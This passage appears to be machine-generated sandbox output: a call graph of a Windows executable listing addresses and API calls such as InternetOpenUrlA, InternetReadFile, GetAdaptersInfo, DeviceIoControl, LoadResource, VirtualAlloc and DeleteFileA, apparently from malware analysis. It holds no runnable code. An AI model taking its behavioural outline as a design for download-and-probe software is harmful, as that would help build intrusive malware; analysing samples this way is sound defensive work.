a0d394 18501->18502 18504 a02eb4 _free 59 API calls 18501->18504 18505 a0d3a6 18502->18505 18506 a02eb4 _free 59 API calls 18502->18506 18503->18501 18504->18502 18507 a0d3b8 18505->18507 18508 a02eb4 _free 59 API calls 18505->18508 18506->18505 18509 a0d3ca 18507->18509 18511 a02eb4 _free 59 API calls 18507->18511 18508->18507 18510 a0d3dc 18509->18510 18512 a02eb4 _free 59 API calls 18509->18512 18513 a0d3ee 18510->18513 18514 a02eb4 _free 59 API calls 18510->18514 18511->18509 18512->18510 18515 a0d400 18513->18515 18516 a02eb4 _free 59 API calls 18513->18516 18514->18513 18515->18491 18517 a02eb4 _free 59 API calls 18515->18517 18516->18515 18517->18491 18519 a0d421 18518->18519 18529 a0d479 18518->18529 18520 a02eb4 _free 59 API calls 18519->18520 18521 a0d431 18519->18521 18520->18521 18522 a02eb4 _free 59 API calls 18521->18522 18524 a0d443 18521->18524 18522->18524 18523 a0d455 18526 a0d467 18523->18526 18527 a02eb4 _free 59 API calls 18523->18527 18524->18523 18525 a02eb4 _free 59 API calls 18524->18525 18525->18523 18528 a02eb4 _free 59 API calls 18526->18528 18526->18529 18527->18526 18528->18529 18529->18485 18531 a04fe9 18530->18531 18532 a0d48c 18530->18532 18531->18471 18533 a02eb4 _free 59 API calls 18532->18533 18534 a0d494 18533->18534 18535 a02eb4 _free 59 API calls 18534->18535 18536 a0d49c 18535->18536 18537 a02eb4 _free 59 API calls 18536->18537 18538 a0d4a4 18537->18538 18539 a02eb4 _free 59 API calls 18538->18539 18540 a0d4ac 18539->18540 18541 a02eb4 _free 59 API calls 18540->18541 18542 a0d4b4 18541->18542 18543 a02eb4 _free 59 API calls 18542->18543 18544 a0d4bc 18543->18544 18545 a02eb4 _free 59 API calls 18544->18545 18546 a0d4c3 18545->18546 18547 a02eb4 _free 59 API calls 18546->18547 18706->18488 18707 402f22 GetVersion 18731 40325a HeapCreate 18707->18731 18709 402f81 18710 402f86 18709->18710 18711 402f8e 18709->18711 18806 40303d 18710->18806 18743 404842 18711->18743 18715 402f96 GetCommandLineA 18757 404710 18715->18757 18719 402fb0 18789 40440a 18719->18789 18721 402fb5 18722 402fba GetStartupInfoA 18721->18722 18802 4043b2 18722->18802 18724 402fcc GetModuleHandleA 18726 402ff0 18724->18726 18812 404159 18726->18812 18732 4032b0 18731->18732 18733 40327a 18731->18733 18732->18709 18819 403112 18733->18819 18736 403296 18739 4032b3 18736->18739 18833 403b08 18736->18833 18737 403289 18831 4032b7 HeapAlloc 18737->18831 18739->18709 18740 403293 18740->18739 18742 4032a4 HeapDestroy 18740->18742 18742->18732 18896 402e70 18743->18896 18746 404861 GetStartupInfoA 18754 404972 18746->18754 18756 4048ad 18746->18756 18749 4049d9 SetHandleCount 18749->18715 18750 404999 GetStdHandle 18752 4049a7 GetFileType 18750->18752 18750->18754 18751 402e70 12 API calls 18751->18756 18752->18754 18753 40491e 18753->18754 18755 404940 GetFileType 18753->18755 18754->18749 18754->18750 18755->18753 18756->18751 18756->18753 18756->18754 18758 40472b GetEnvironmentStringsW 18757->18758 18759 40475e 18757->18759 18760 404733 18758->18760 18762 40473f GetEnvironmentStrings 18758->18762 18759->18760 18761 40474f 18759->18761 18764 404777 WideCharToMultiByte 18760->18764 18765 40476b GetEnvironmentStringsW 18760->18765 18763 402fa6 18761->18763 18766 4047f1 GetEnvironmentStrings 18761->18766 18767 4047fd 18761->18767 18762->18761 18762->18763 18780 4044c3 18763->18780 18769 4047ab 18764->18769 18770 4047dd FreeEnvironmentStringsW 18764->18770 18765->18763 18765->18764 18766->18763 18766->18767 18771 402e70 12 API calls 18767->18771 18772 402e70 12 API calls 18769->18772 18770->18763 18778 404818 18771->18778 18773 4047b1 18772->18773 18773->18770 18774 4047ba WideCharToMultiByte 18773->18774 18776 4047d4 18774->18776 18777 4047cb 18774->18777 18775 40482e FreeEnvironmentStringsA 18775->18763 18776->18770 18962 403061 18777->18962 18778->18775 18781 4044d5 18780->18781 18782 4044da GetModuleFileNameA 18780->18782 18992 40583b 18781->18992 18784 4044fd 18782->18784 18785 402e70 12 API calls 18784->18785 18786 40451e 18785->18786 18787 40452e 18786->18787 18788 403018 7 API calls 18786->18788 18787->18719 18788->18787 18790 404417 18789->18790 18793 40441c 18789->18793 18791 40583b 19 API calls 18790->18791 18791->18793 18792 402e70 12 API calls 18794 404449 18792->18794 18793->18792 18795 403018 7 API calls 18794->18795 18801 40445d 18794->18801 18795->18801 18796 4044a0 18797 403061 7 API calls 18796->18797 18798 4044ac 18797->18798 18798->18721 18799 402e70 12 API calls 18799->18801 18800 403018 7 API calls 18800->18801 18801->18796 18801->18799 18801->18800 18803 4043bb 18802->18803 18805 4043c0 18802->18805 18804 40583b 19 API calls 18803->18804 18804->18805 18805->18724 18807 403046 18806->18807 18808 40304b 18806->18808 18809 404bc0 7 API calls 18807->18809 18810 404bf9 7 API calls 18808->18810 18809->18808 18811 403054 ExitProcess 18810->18811 19016 40417b 18812->19016 18815 40422e 18816 40423a 18815->18816 18817 404363 UnhandledExceptionFilter 18816->18817 18818 40300a 18816->18818 18817->18818 18842 402d50 18819->18842 18822 403155 GetEnvironmentVariableA 18824 403232 18822->18824 18827 403174 18822->18827 18823 40313b 18823->18822 18825 40314d 18823->18825 18824->18825 18847 4030e5 GetModuleHandleA 18824->18847 18825->18736 18825->18737 18828 4031b9 GetModuleFileNameA 18827->18828 18829 4031b1 18827->18829 18828->18829 18829->18824 18844 404d4c 18829->18844 18832 4032d3 18831->18832 18832->18740 18834 403b15 18833->18834 18835 403b1c HeapAlloc 18833->18835 18836 403b39 VirtualAlloc 18834->18836 18835->18836 18841 403b71 18835->18841 18837 403b59 VirtualAlloc 18836->18837 18838 403c2e 18836->18838 18839 403c20 VirtualFree 18837->18839 18837->18841 18840 403c36 HeapFree 18838->18840 18838->18841 18839->18838 18840->18841 18841->18740 18843 402d5c GetVersionExA 18842->18843 18843->18822 18843->18823 18849 404d63 18844->18849 18848 4030fc 18847->18848 18848->18825 18851 404d7b 18849->18851 18853 404dab 18851->18853 18856 405aaa 18851->18856 18852 405aaa 6 API calls 18852->18853 18853->18852 18855 404d5f 18853->18855 18860 4059de 18853->18860 18855->18824 18857 405ac8 18856->18857 18859 405abc 18856->18859 18866 405d6e 18857->18866 18859->18851 18862 4059ec 18860->18862 18863 405a09 18860->18863 18861 405a25 18861->18862 18878 405b1f 18861->18878 18862->18853 18863->18861 18864 405aaa 6 API calls 18863->18864 18864->18861 18867 405db7 18866->18867 18868 405d9f GetStringTypeW 18866->18868 18870 405de2 GetStringTypeA 18867->18870 18871 405e06 18867->18871 18868->18867 18869 405dbb GetStringTypeA 18868->18869 18869->18867 18872 405ea3 18869->18872 18870->18872 18871->18872 18874 405e1c MultiByteToWideChar 18871->18874 18872->18859 18874->18872 18875 405e40 18874->18875 18875->18872 18876 405e7a MultiByteToWideChar 18875->18876 18876->18872 18877 405e93 GetStringTypeW 18876->18877 18877->18872 18879 405b4f LCMapStringW 18878->18879 18881 405b6b 18878->18881 18880 405b73 LCMapStringA 18879->18880 18879->18881 18880->18881 18883 405cad 18880->18883 18882 405bb4 LCMapStringA 18881->18882 18885 405bd1 18881->18885 18882->18883 18883->18862 18884 405be7 MultiByteToWideChar 18884->18883 18886 405c11 18884->18886 18885->18883 18885->18884 18886->18883 18887 405c47 MultiByteToWideChar 18886->18887 18887->18883 18888 405c60 LCMapStringW 18887->18888 18888->18883 18889 405c7b 18888->18889 18890 405c81 18889->18890 18892 405cc1 18889->18892 18890->18883 18891 405c8f LCMapStringW 18890->18891 18891->18883 18892->18883 18893 405cf9 LCMapStringW 18892->18893 18893->18883 18894 405d11 WideCharToMultiByte 18893->18894 18894->18883 18905 402e82 18896->18905 18899 403018 18900 403021 18899->18900 18901 403026 18899->18901 18942 404bc0 18900->18942 18948 404bf9 18901->18948 18906 402e7f 18905->18906 18908 402e89 18905->18908 18906->18746 18906->18899 18908->18906 18909 402eae 18908->18909 18910 402ed2 18909->18910 18911 402ebd 18909->18911 18913 402f11 HeapAlloc 18910->18913 18917 402ecb 18910->18917 18924 403e00 18910->18924 18911->18917 18918 403653 18911->18918 18914 402f20 18913->18914 18914->18908 18915 402ed0 18915->18908 18917->18913 18917->18914 18917->18915 18921 403685 18918->18921 18919 403724 18923 403733 18919->18923 18938 403a0d 18919->18938 18921->18919 18921->18923 18931 40395c 18921->18931 18923->18917 18929 403e0e 18924->18929 18925 403efa VirtualAlloc 18930 403ecb 18925->18930 18926 403fcf 18927 403b08 5 API calls 18926->18927 18927->18930 18929->18925 18929->18926 18929->18930 18930->18917 18932 40399f HeapAlloc 18931->18932 18933 40396f HeapReAlloc 18931->18933 18935 4039ef 18932->18935 18936 4039c5 VirtualAlloc 18932->18936 18934 40398e 18933->18934 18933->18935 18934->18932 18935->18919 18936->18935 18937 4039df HeapFree 18936->18937 18937->18935 18939 403a1f VirtualAlloc 18938->18939 18941 403a68 18939->18941 18941->18923 18943 404bca 18942->18943 18944 404bf9 7 API calls 18943->18944 18947 404bf7 18943->18947 18945 404be1 18944->18945 18946 404bf9 7 API calls 18945->18946 18946->18947 18947->18901 18950 404c0c 18948->18950 18949 404d23 18952 404d36 GetStdHandle WriteFile 18949->18952 18950->18949 18951 404c4c 18950->18951 18956 40302f 18950->18956 18953 404c58 GetModuleFileNameA 18951->18953 18951->18956 18952->18956 18954 404c70 18953->18954 18957 405857 18954->18957 18956->18746 18958 405864 LoadLibraryA 18957->18958 18960 4058a6 18957->18960 18959 405875 GetProcAddress 18958->18959 18958->18960 18959->18960 18961 40588c GetProcAddress GetProcAddress 18959->18961 18960->18956 18961->18960 18963 403089 18962->18963 18964 40306d 18962->18964 18963->18776 18965 403077 18964->18965 18966 40308d 18964->18966 18968 4030b9 HeapFree 18965->18968 18969 403083 18965->18969 18967 4030b8 18966->18967 18971 4030a7 18966->18971 18967->18968 18968->18963 18973 40332a 18969->18973 18979 403dbb 18971->18979 18975 403368 18973->18975 18978 40361e 18973->18978 18974 403564 VirtualFree 18976 4035c8 18974->18976 18975->18974 18975->18978 18977 4035d7 VirtualFree HeapFree 18976->18977 18976->18978 18977->18978 18978->18963 18980 403dfe 18979->18980 18981 403de8 18979->18981 18980->18963 18981->18980 18983 403ca2 18981->18983 18986 403caf 18983->18986 18984 403d5f 18984->18980 18985 403cd0 VirtualFree 18985->18986 18986->18984 18986->18985 18988 403c4c VirtualFree 18986->18988 18989 403c69 18988->18989 18990 403c99 18989->18990 18991 403c79 HeapFree 18989->18991 18990->18986 18991->18986 18993 405844 18992->18993 18994 40584b 18992->18994 18996 405477 18993->18996 18994->18782 19003 405610 18996->19003 18998 405604 18998->18994 19001 4054ba GetCPInfo 19002 4054ce 19001->19002 19002->18998 19008 4056b6 GetCPInfo 19002->19008 19004 405630 19003->19004 19005 405620 GetOEMCP 19003->19005 19006 405488 19004->19006 19007 405635 GetACP 19004->19007 19005->19004 19006->18998 19006->19001 19006->19002 19007->19006 19009 4057a1 19008->19009 19011 4056d9 19008->19011 19009->18998 19010 405d6e 6 API calls 19012 405755 19010->19012 19011->19010 19013 405b1f 9 API calls 19012->19013 19014 405779 19013->19014 19015 405b1f 9 API calls 19014->19015 19015->19009 19017 404187 GetCurrentProcess TerminateProcess 19016->19017 19018 404198 19016->19018 19017->19018 19019 402ff9 19018->19019 19020 404202 ExitProcess 19018->19020 19019->18815 19021 402223 19022 40b055 19021->19022 19023 4022ba 19022->19023 19025 401f64 FindResourceA 19022->19025 19026 401f86 GetLastError SizeofResource 19025->19026 19031 401f9f 19025->19031 19027 401fa6 LoadResource LockResource GlobalAlloc 19026->19027 19026->19031 19028 401fd2 19027->19028 19029 401ffb GetTickCount 19028->19029 19032 402005 GlobalAlloc 19029->19032 19031->19023 19032->19031 19033 9ff8da LoadLibraryA 19034 9ff9bd 19033->19034 19035 9ff903 GetProcAddress 19033->19035 19036 9ff9b6 FreeLibrary 19035->19036 19039 9ff917 19035->19039 19036->19034 19037 9ff929 GetAdaptersInfo 19037->19039 19038 9ff9b1 19038->19036 19039->19037 19039->19038 19041 a03a8f 19039->19041 19044 a03a97 19041->19044 19042 a02eec _malloc 59 API calls 19042->19044 19043 a03ab1 19043->19039 19044->19042 19044->19043 19045 a08143 _malloc RtlDecodePointer 19044->19045 19046 a03ab5 std::exception::exception 19044->19046 19045->19044 19049 a0449a 19046->19049 19048 a03adf 19051 a044b9 RaiseException 19049->19051 19051->19048 19052 a6020e 19053 a6afb3 DeleteFileA 19052->19053 19055 9ff7d6 CreateFileA 19056 9ff8d2 19055->19056 19059 9ff807 19055->19059 19057 9ff81f DeviceIoControl 19057->19059 19058 9ff8c8 FindCloseChangeNotification 19058->19056 19059->19057 19059->19058 19060 9ff894 GetLastError 19059->19060 19061 a03a8f _Allocate 60 API calls 19059->19061 19060->19058 19060->19059 19061->19059 19065 40b72c 19066 40b761 19065->19066 19067 40b6f2 Sleep 19066->19067 19068 40b775 19066->19068 19068->19068 19069 4024ec 19070 40b5ed WaitForSingleObject 19069->19070 19072 40b66d 19073 40b673 Sleep 19072->19073 19074 40b93b 19073->19074 19075 40b00d RegCreateKeyExA 19076 40b01b 19075->19076 19077 40226e 19078 4022bb 19077->19078 19079 40227b 19077->19079 19080 40b414 lstrcmpiW 19079->19080 19081 402283 19079->19081 19080->19081 19082 40b8ce 19083 40b8d3 LoadLibraryExA 19082->19083 19084 4021e1 19083->19084 19085 40b2ef 19086 40b2f5 VirtualAlloc 19085->19086 19087 40b359 19085->19087 19086->19087 19087->19087 19088 a35af3 19089 a455dc CreateFileA 19088->19089 19090 a827c6 19089->19090 19091 a5a835 19092 a5e3b9 19091->19092 19094 a02eec 59 API calls 19092->19094 19093 a5e3be 19095 a02eec 59 API calls 19093->19095 19094->19093 19095->19093 19096 9f104d 19097 a032e7 __cinit 68 API calls 19096->19097 19098 9f1057 19097->19098 19101 9f1aa9 InterlockedIncrement 19098->19101 19102 9f105c 19101->19102 19103 9f1ac5 WSAStartup InterlockedExchange 19101->19103 19103->19102 19104 9f6487 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 19182 9f42c7 19104->19182 19183 9f72a7 InternetOpenA 19184 9f72c5 InternetSetOptionA InternetSetOptionA InternetSetOptionA 19183->19184 19196 9f66f0 shared_ptr __gmtime64_s 19183->19196 19190 9f733e __gmtime64_s 19184->19190 19185 9f731e InternetOpenUrlA 19186 9f737e InternetCloseHandle 19185->19186 19185->19190 19186->19196 19187 9f670a RtlEnterCriticalSection RtlLeaveCriticalSection 19187->19196 19188 9f6704 Sleep 19188->19187 19189 9f7342 InternetReadFile 19189->19190 19191 9f7373 InternetCloseHandle 19189->19191 19190->19185 19190->19189 19191->19186 19192 9f73e5 RtlEnterCriticalSection RtlLeaveCriticalSection 19294 a0227c 19192->19294 19194 a02eec _malloc 59 API calls 19195 9f7499 RtlEnterCriticalSection RtlLeaveCriticalSection 19194->19195 19195->19196 19196->19183 19196->19187 19196->19188 19196->19192 19196->19194 19197 9f7766 RtlEnterCriticalSection RtlLeaveCriticalSection 19196->19197 19199 a0227c 66 API calls 19196->19199 19202 9f78de RtlEnterCriticalSection 19196->19202 19203 9f790b RtlLeaveCriticalSection 19196->19203 19206 a02eec 59 API calls _malloc 19196->19206 19207 a02eb4 59 API calls _free 19196->19207 19210 a03529 60 API calls _strtok 19196->19210 19213 a03a8f _Allocate 60 API calls 19196->19213 19218 9fa658 73 API calls 19196->19218 19222 9f76e8 Sleep 19196->19222 19223 9f76e3 shared_ptr 19196->19223 19226 9f5119 19196->19226 19255 9fab42 19196->19255 19265 9f61f1 19196->19265 19268 9f826e 19196->19268 19274 9fd04a 19196->19274 19279 9f831d 19196->19279 19287 9f33b2 19196->19287 19304 a02790 19196->19304 19307 9f966a 19196->19307 19314 9fa782 19196->19314 19322 9f4100 19196->19322 19326 a02358 19196->19326 19335 9f1ba7 19196->19335 19351 9f3d7e 19196->19351 19358 9f8f36 19196->19358 19365 9f534d 19196->19365 19197->19196 19199->19196 19202->19196 19202->19203 19344 9f3c67 19203->19344 19206->19196 19207->19196 19210->19196 19213->19196 19218->19196 19318 a01830 19222->19318 19223->19222 19227 9f5123 __EH_prolog 19226->19227 19375 a00a50 19227->19375 19230 9f3c67 72 API calls 19231 9f514a 19230->19231 19232 9f3d7e 64 API calls 19231->19232 19233 9f5158 19232->19233 19234 9f826e 89 API calls 19233->19234 19235 9f516c 19234->19235 19238 9f5322 shared_ptr 19235->19238 19379 9fa658 19235->19379 19238->19196 19239 9f51f6 19241 9fa658 73 API calls 19239->19241 19240 9f51c4 19242 9fa658 73 API calls 19240->19242 19244 9f5207 19241->19244 19243 9f51d4 19242->19243 19243->19238 19247 9fa658 73 API calls 19243->19247 19244->19238 19245 9fa658 73 API calls 19244->19245 19246 9f524a 19245->19246 19246->19238 19249 9fa658 73 API calls 19246->19249 19248 9f52b4 19247->19248 19248->19238 19250 9fa658 73 API calls 19248->19250 19249->19243 19251 9f52da 19250->19251 19251->19238 19252 9fa658 73 API calls 19251->19252 19253 9f5304 19252->19253 19384 9fce0c 19253->19384 19256 9fab4c __EH_prolog 19255->19256 19435 9fd021 19256->19435 19258 9fab6d shared_ptr 19438 a02030 19258->19438 19260 9fab9a 19260->19196 19261 9fab84 19261->19260 19444 9f3fb0 19261->19444 19266 a02eec _malloc 59 API calls 19265->19266 19267 9f6204 19266->19267 19269 9f8286 19268->19269 19272 9f82a7 19268->19272 19887 9f9530 19269->19887 19273 9f82cc 19272->19273 19890 9f2ac7 19272->19890 19273->19196 19275 a00a50 Mailbox 68 API calls 19274->19275 19276 9fd060 19275->19276 19277 9fd14e 19276->19277 19278 9f2db5 73 API calls 19276->19278 19277->19196 19278->19276 19280 9f8338 WSASetLastError shutdown 19279->19280 19281 9f8328 19279->19281 19283 9fa43c 69 API calls 19280->19283 19282 a00a50 Mailbox 68 API calls 19281->19282 19284 9f832d 19282->19284 19285 9f8355 19283->19285 19284->19196 19285->19284 19286 a00a50 Mailbox 68 API calls 19285->19286 19286->19284 19288 9f33c4 InterlockedCompareExchange 19287->19288 19289 9f33e1 19287->19289 19288->19289 19290 9f33d6 19288->19290 19291 9f29ee 76 API calls 19289->19291 19984 9f32ab 19290->19984 19293 9f33f1 19291->19293 19293->19196 19295 a02288 19294->19295 19300 a022ab 19294->19300 19297 a0228e 19295->19297 19295->19300 19299 a05d9b _malloc 59 API calls 19297->19299 19298 a022be 19298->19196 19301 a02293 19299->19301 20037 a022c3 19300->20037 19302 a04e35 __gmtime64_s 9 API calls 19301->19302 19303 a0229e 19302->19303 19303->19196 20047 a027ae 19304->20047 19306 a027a9 19306->19196 19308 9f9674 __EH_prolog 19307->19308 19309 9f1ba7 210 API calls 19308->19309 19310 9f96c9 19309->19310 19311 9f96e6 RtlEnterCriticalSection 19310->19311 19312 9f9704 RtlLeaveCriticalSection 19311->19312 19313 9f9701 19311->19313 19312->19196 19313->19312 19315 9fa78c __EH_prolog 19314->19315 20053 9fdf33 19315->20053 19317 9fa7aa shared_ptr 19317->19196 19319 a01861 19318->19319 19320 a0183d 19318->19320 19319->19196 19320->19319 19321 a01851 GetProcessHeap HeapFree 19320->19321 19321->19319 19323 9f4118 19322->19323 19324 9f4112 19322->19324 19323->19196 20057 9fa636 19324->20057 19327 a02374 19326->19327 19328 a02389 19326->19328 19330 a05d9b _malloc 59 API calls 19327->19330 19328->19327 19329 a02390 19328->19329 19333 a02384 19329->19333 20059 a05e41 19329->20059 19331 a02379 19330->19331 19332 a04e35 __gmtime64_s 9 API calls 19331->19332 19332->19333 19333->19196 20260 a15330 19335->20260 19337 9f1bb1 RtlEnterCriticalSection 19338 9f1be9 RtlLeaveCriticalSection 19337->19338 19340 9f1bd1 19337->19340 20261 9fe263 19338->20261 19340->19338 19341 9f1c55 RtlLeaveCriticalSection 19340->19341 19341->19196 19342 9f1c22 19342->19341 19345 a00a50 Mailbox 68 API calls 19344->19345 19346 9f3c7e 19345->19346 20343 9f3ca2 19346->20343 19352 9f3dcb htons 19351->19352 19353 9f3d99 htons 19351->19353 20376 9f3c16 19352->20376 20370 9f3bd3 19353->20370 19357 9f3ded 19357->19196 19359 9f8f40 __EH_prolog 19358->19359 20407 9f373f 19359->20407 19361 9f8f5a RtlEnterCriticalSection 19362 9f8f69 RtlLeaveCriticalSection 19361->19362 19364 9f8fa3 19362->19364 19364->19196 19366 a02eec _malloc 59 API calls 19365->19366 19367 9f5362 SHGetSpecialFolderPathA 19366->19367 19368 9f5378 19367->19368 20416 a036b4 19368->20416 19372 9f53dc 20432 a039c7 19372->20432 19374 9f53e2 19374->19196 19376 a00a79 19375->19376 19378 9f513d 19375->19378 19377 a032e7 __cinit 68 API calls 19376->19377 19377->19378 19378->19230 19380 a00a50 Mailbox 68 API calls 19379->19380 19382 9fa672 19380->19382 19381 9f519d 19381->19238 19381->19239 19381->19240 19382->19381 19389 9f2db5 19382->19389 19385 a00a50 Mailbox 68 API calls 19384->19385 19387 9fce26 19385->19387 19386 9fcf35 19386->19238 19387->19386 19416 9f2b95 19387->19416 19390 9f2dca 19389->19390 19391 9f2de4 19389->19391 19392 a00a50 Mailbox 68 API calls 19390->19392 19393 9f2dfc 19391->19393 19395 9f2def 19391->19395 19397 9f2dcf 19392->19397 19403 9f2d39 WSASetLastError WSASend 19393->19403 19396 a00a50 Mailbox 68 API calls 19395->19396 19396->19397 19397->19382 19398 9f2e54 WSASetLastError select 19413 9fa43c 19398->19413 19400 a00a50 68 API calls Mailbox 19401 9f2e0c 19400->19401 19401->19397 19401->19398 19401->19400 19402 9f2d39 71 API calls 19401->19402 19402->19401 19404 9fa43c 69 API calls 19403->19404 19405 9f2d6e 19404->19405 19406 9f2d75 19405->19406 19407 9f2d82 19405->19407 19408 a00a50 Mailbox 68 API calls 19406->19408 19409 9f2d7a 19407->19409 19410 a00a50 Mailbox 68 API calls 19407->19410 19408->19409 19411 a00a50 Mailbox 68 API calls 19409->19411 19412 9f2d9c 19409->19412 19410->19409 19411->19412 19412->19401 19414 a00a50 Mailbox 68 API calls 19413->19414 19415 9fa448 WSAGetLastError 19414->19415 19415->19401 19417 9f2bc7 19416->19417 19418 9f2bb1 19416->19418 19420 9f2bd2 19417->19420 19430 9f2bdf 19417->19430 19419 a00a50 Mailbox 68 API calls 19418->19419 19424 9f2bb6 19419->19424 19422 a00a50 Mailbox 68 API calls 19420->19422 19421 9f2be2 WSASetLastError WSARecv 19423 9fa43c 69 API calls 19421->19423 19422->19424 19423->19430 19424->19387 19425 a00a50 68 API calls Mailbox 19425->19430 19426 9f2d22 19431 9f1996 19426->19431 19428 9f2cbc WSASetLastError select 19429 9fa43c 69 API calls 19428->19429 19429->19430 19430->19421 19430->19424 19430->19425 19430->19426 19430->19428 19432 9f199f 19431->19432 19434 9f19bb 19431->19434 19433 a032e7 __cinit 68 API calls 19432->19433 19433->19434 19434->19424 19457 9fe1b3 19435->19457 19437 9fd033 19437->19258 19539 a032fc 19438->19539 19441 a02054 19441->19261 19442 a0207d ResumeThread 19442->19261 19443 a02076 CloseHandle 19443->19442 19445 a00a50 Mailbox 68 API calls 19444->19445 19446 9f3fb8 19445->19446 19858 9f1815 19446->19858 19449 9fa5be 19450 9fa5c8 __EH_prolog 19449->19450 19864 9fcb76 19450->19864 19455 a0449a __CxxThrowException@8 RaiseException 19456 9fa5fc 19455->19456 19458 9fe1bd __EH_prolog 19457->19458 19463 9f4030 19458->19463 19462 9fe1eb 19462->19437 19475 a15330 19463->19475 19465 9f403a GetProcessHeap RtlAllocateHeap 19466 9f407c 19465->19466 19467 9f4053 std::exception::exception 19465->19467 19466->19462 19469 9f408a 19466->19469 19476 9fa5fd 19467->19476 19470 9f4094 __EH_prolog 19469->19470 19520 9fa21c 19470->19520 19475->19465 19477 9fa607 __EH_prolog 19476->19477 19484 9fcbac 19477->19484 19482 a0449a __CxxThrowException@8 RaiseException 19483 9fa635 19482->19483 19490 9fd70c 19484->19490 19487 9fcbc6 19512 9fd744 19487->19512 19489 9fa624 19489->19482 19493 a02453 19490->19493 19496 a02481 19493->19496 19497 a0248f 19496->19497 19499 9fa616 19496->19499 19502 a02517 19497->19502 19499->19487 19503 a02520 19502->19503 19505 a02494 19502->19505 19504 a02eb4 _free 59 API calls 19503->19504 19504->19505 19505->19499 19506 a024d9 19505->19506 19507 a024e5 _strlen 19506->19507 19510 a0250a 19506->19510 19508 a02eec _malloc 59 API calls 19507->19508 19509 a024f7 19508->19509 19509->19510 19511 a06bfc __fltout2 59 API calls 19509->19511 19510->19499 19511->19510 19513 9fd74e __EH_prolog 19512->19513 19516 9fb66f 19513->19516 19515 9fd785 Mailbox 19515->19489 19517 9fb679 __EH_prolog 19516->19517 19518 a02453 std::exception::exception 59 API calls 19517->19518 19519 9fb68a Mailbox 19518->19519 19519->19515 19531 9fb033 19520->19531 19523 9f3fdc 19538 a15330 19523->19538 19525 9f3fe6 CreateEventA 19526 9f400f 19525->19526 19527 9f3ffd 19525->19527 19526->19462 19528 9f3fb0 Mailbox 68 API calls 19527->19528 19529 9f4005 19528->19529 19530 9fa5be Mailbox 60 API calls 19529->19530 19530->19526 19532 9fb03f 19531->19532 19533 9f40c1 19531->19533 19534 a03a8f _Allocate 60 API calls 19532->19534 19535 9fb04f std::exception::exception 19532->19535 19533->19523 19534->19535 19535->19533 19536 a0449a __CxxThrowException@8 RaiseException 19535->19536 19537 9ffa64 19536->19537 19538->19525 19540 a0330a 19539->19540 19541 a0331e 19539->19541 19542 a05d9b _malloc 59 API calls 19540->19542 19543 a089ac __calloc_crt 59 API calls 19541->19543 19544 a0330f 19542->19544 19545 a0332b 19543->19545 19547 a04e35 __gmtime64_s 9 API calls 19544->19547 19546 a0337c 19545->19546 19548 a05b9a FindHandler 59 API calls 19545->19548 19549 a02eb4 _free 59 API calls 19546->19549 19553 a0204b 19547->19553 19550 a03338 19548->19550 19551 a03382 19549->19551 19552 a05c21 __initptd 59 API calls 19550->19552 19551->19553 19558 a05d7a 19551->19558 19554 a03341 CreateThread 19552->19554 19553->19441 19553->19442 19553->19443 19554->19553 19557 a03374 GetLastError 19554->19557 19566 a0345c 19554->19566 19557->19546 19563 a05d67 19558->19563 19560 a05d83 _free 19561 a05d9b _malloc 59 API calls 19560->19561 19562 a05d96 19561->19562 19562->19553 19564 a05bb2 __getptd_noexit 59 API calls 19563->19564 19565 a05d6c 19564->19565 19565->19560 19567 a03465 __threadstartex@4 19566->19567 19568 a0910b __CRT_INIT@12 TlsGetValue 19567->19568 19569 a0346b 19568->19569 19570 a03472 __threadstartex@4 19569->19570 19571 a0349e 19569->19571 19574 a0912a __CRT_INIT@12 TlsSetValue 19570->19574 19572 a05a2f __freefls@4 59 API calls 19571->19572 19573 a034b9 ___crtIsPackagedApp 19572->19573 19576 a034cd 19573->19576 19582 a03404 19573->19582 19575 a03481 19574->19575 19577 a03494 GetCurrentThreadId 19575->19577 19578 a03487 GetLastError RtlExitUserThread 19575->19578 19588 a03395 19576->19588 19577->19573 19578->19577 19583 a03446 RtlDecodePointer 19582->19583 19584 a0340d LoadLibraryExW GetProcAddress 19582->19584 19587 a03456 19583->19587 19585 a03430 RtlEncodePointer 19584->19585 19586 a0342f 19584->19586 19585->19583 19586->19576 19587->19576 19589 a033a1 __fcloseall 19588->19589 19590 a05b9a FindHandler 59 API calls 19589->19590 19591 a033a6 19590->19591 19598 a020a0 19591->19598 19616 a01550 19598->19616 19601 a020f0 19638 9fdce7 19601->19638 19602 a020e8 TlsSetValue 19602->19601 19635 a015b4 19616->19635 19617 a01630 19618 a01646 19617->19618 19620 a01643 CloseHandle 19617->19620 19622 a0448b __atodbl_l 6 API calls 19618->19622 19619 a015cc 19621 a0160e ResetEvent 19619->19621 19625 a015e5 OpenEventA 19619->19625 19654 a01b50 19619->19654 19620->19618 19623 a01615 19621->19623 19626 a0165e 19622->19626 19658 a01790 19623->19658 19624 a016dc WaitForSingleObject 19624->19635 19627 a01607 19625->19627 19628 a015ff 19625->19628 19626->19601 19626->19602 19627->19621 19627->19623 19628->19627 19630 a01604 CloseHandle 19628->19630 19630->19627 19631 a016b0 CreateEventA 19631->19635 19632 a015e2 19632->19625 19633 a01b50 GetCurrentProcessId 19633->19635 19635->19617 19635->19619 19635->19624 19635->19631 19635->19633 19636 a016ce CloseHandle 19635->19636 19636->19635 19639 9fdd09 19638->19639 19669 9f4d86 19639->19669 19640 9fdd0c 19642 a01e70 19640->19642 19643 a01ea9 TlsGetValue 19642->19643 19653 a01ea1 Mailbox 19642->19653 19643->19653 19644 a01f1d 19646 a01ef9 19647 a01f89 GetProcessHeap HeapFree 19647->19653 19652 a01f7b GetProcessHeap HeapFree 19652->19647 19653->19644 19653->19646 19653->19647 19653->19652 19668 a00bb0 19654->19668 19656 a01ba2 GetCurrentProcessId 19657 a01bb5 19656->19657 19657->19632 19659 a0179f 19658->19659 19662 a017d5 CreateEventA 19659->19662 19663 a01b50 GetCurrentProcessId 19659->19663 19664 a017f7 19659->19664 19660 a01803 SetEvent 19661 a0162d 19660->19661 19661->19617 19662->19664 19665 a017eb 19662->19665 19666 a017d2 19663->19666 19664->19660 19664->19661 19665->19664 19667 a017f0 CloseHandle 19665->19667 19666->19662 19667->19664 19668->19656 19670 9f4d90 __EH_prolog 19669->19670 19671 a00a50 Mailbox 68 API calls 19670->19671 19672 9f4da6 RtlEnterCriticalSection RtlLeaveCriticalSection 19671->19672 19673 9f50d4 shared_ptr 19672->19673 19686 9f4dd1 std::bad_exception::bad_exception 19672->19686 19673->19640 19675 9f50a1 RtlEnterCriticalSection RtlLeaveCriticalSection 19676 9f50b3 RtlEnterCriticalSection RtlLeaveCriticalSection 19675->19676 19676->19673 19676->19686 